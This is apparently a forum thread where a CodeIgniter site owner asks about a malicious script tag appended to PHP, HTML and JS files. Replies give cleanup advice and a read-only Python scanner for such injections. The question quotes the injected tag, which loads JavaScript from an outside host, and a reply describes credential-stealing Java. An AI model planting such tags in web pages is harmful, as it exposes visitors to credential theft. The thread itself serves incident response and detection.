Hi to all,

I have a problem with my website. I don't know why the script below was inserted into index.php. This index.php is part of CodeIgniter, the framework that I am currently using. Is this inserted through FTP access or through code? After I deleted this script I noticed that on the lower left of my browser there is another URL being read. I don't know how to trace this because I tried to find this URL but I couldn't see it. Please help me.

I encountered this scenario twice.

Any suggestion would be greatly appreciated.

 <script type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></script>
 <!--11428cb2b3b67368730c012cb53eb247-->
+1  A: 

Your site has probably been compromised by an attacker. This sort of thing can happen if you have any folders that are world-writable (check your folder permissions). Also check for new files that weren't there before (they could be named anything and could be in any folder within the site's root folder).

For some more info on similar attacks, see:

http://forums.techguy.org/virus-other-malware-removal/871970-strange-b1-html-tag-embedding.html

and

http://www.phpfreaks.com/forums/index.php/topic,274404.msg1297647.html#msg1297647

Ash White
Hi, thanks for your reply. I mean at the end of my php, html and js files that script has been inserted. I tried to replace all the files but after an hour it was attacked again. I checked the file attributes of my folder in FTP and only the owner permission has been checked. I tried to look at the forum links you provided but I couldn't find any clear solution. Thanks a lot.
tirso
Changing the affected files won't fix anything. You need to eradicate the script(s) that were uploaded into the site's folder (there could be one or many). Honestly, the best way to handle it is probably to start with an installation of CodeIgniter and then manually bring in any changes/additions you made to the codebase. Otherwise you might miss one of the malicious scripts and be back to square one.
Ash White
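
A read-only sweep for the three things the answer above and its comments say to look for, as an added example (not code from anyone in this thread): files carrying an appended off-site script tag of the shape in the question, world-writable paths, and files that a clean copy of the site does not have. The `baseline` set of known-good relative paths, the function names, and the sample tree with its placeholder host and marker are assumptions.

```python
import os
import re
import stat
import tempfile

# Shape seen in the question: off-site <script src> with a port, then a 32-hex comment.
INJECT_RE = re.compile(
    rb'<script[^>]+src=["\']https?://[^/"\':]+:\d+/[^"\']*["\'][^>]*>\s*</script>'
    rb'\s*<!--[0-9a-f]{32}-->', re.I)
WEB_EXT = ('.php', '.html', '.htm', '.js')

def scan_webroot(root, baseline=None):
    """Return (injected files, world-writable paths, files absent from baseline)."""
    injected, writable, unknown = [], [], []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            mode = os.lstat(path).st_mode
            if mode & stat.S_IWOTH and not stat.S_ISLNK(mode):
                writable.append(rel)         # anyone on the host can write here
            if not stat.S_ISREG(mode):
                continue
            if baseline is not None and rel not in baseline:
                unknown.append(rel)          # file the clean copy does not have
            if name.lower().endswith(WEB_EXT):
                with open(path, 'rb') as fh:
                    if INJECT_RE.search(fh.read()):
                        injected.append(rel)
    return sorted(injected), sorted(writable), sorted(unknown)

def demo():
    """Scan a constructed sample tree (placeholder host and marker)."""
    root = tempfile.mkdtemp()
    tail = (b'<script type="text/javascript" src="http://injected.example:8080/x.js">'
            b'</script>\n<!--' + b'0123456789abcdef' * 2 + b'-->')
    files = {'index.php': b'<?php echo "home"; ?>\n' + tail,
             'about.php': b'<?php ?>\n<script src="/js/app.js"></script>',
             'x7.php': b'<?php /* not in the clean copy */ ?>'}
    for name, body in files.items():
        path = os.path.join(root, name)
        with open(path, 'wb') as fh:
            fh.write(body)
        os.chmod(path, 0o644)
    os.mkdir(os.path.join(root, 'uploads'))
    os.chmod(os.path.join(root, 'uploads'), 0o777)
    return scan_webroot(root, baseline={'index.php', 'about.php'})

if __name__ == '__main__':
    print(demo())
```

Run it against a downloaded copy of the site, with `baseline` built from the relative paths in a fresh framework install plus your own source control checkout.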
A: 

Hey guys I got some info here: http://www.everythingilike.com/roundstorm-ftp-hack-solution

Basically the js hack inserts a java app which executes. This java app scans your FTP info and even any Shell/SSH login information. I suggest changing all your passwords after the clean up.

Alberto
I think you mean Javascript
stef
The hack consists of both Javascript and Java. Initially the Javascript is executed via the browser, which embeds the Java applet into the web page. The Java applet contains the main nuts/bolts which scans the user's PC for passwords and installs itself onto the system.
Alberto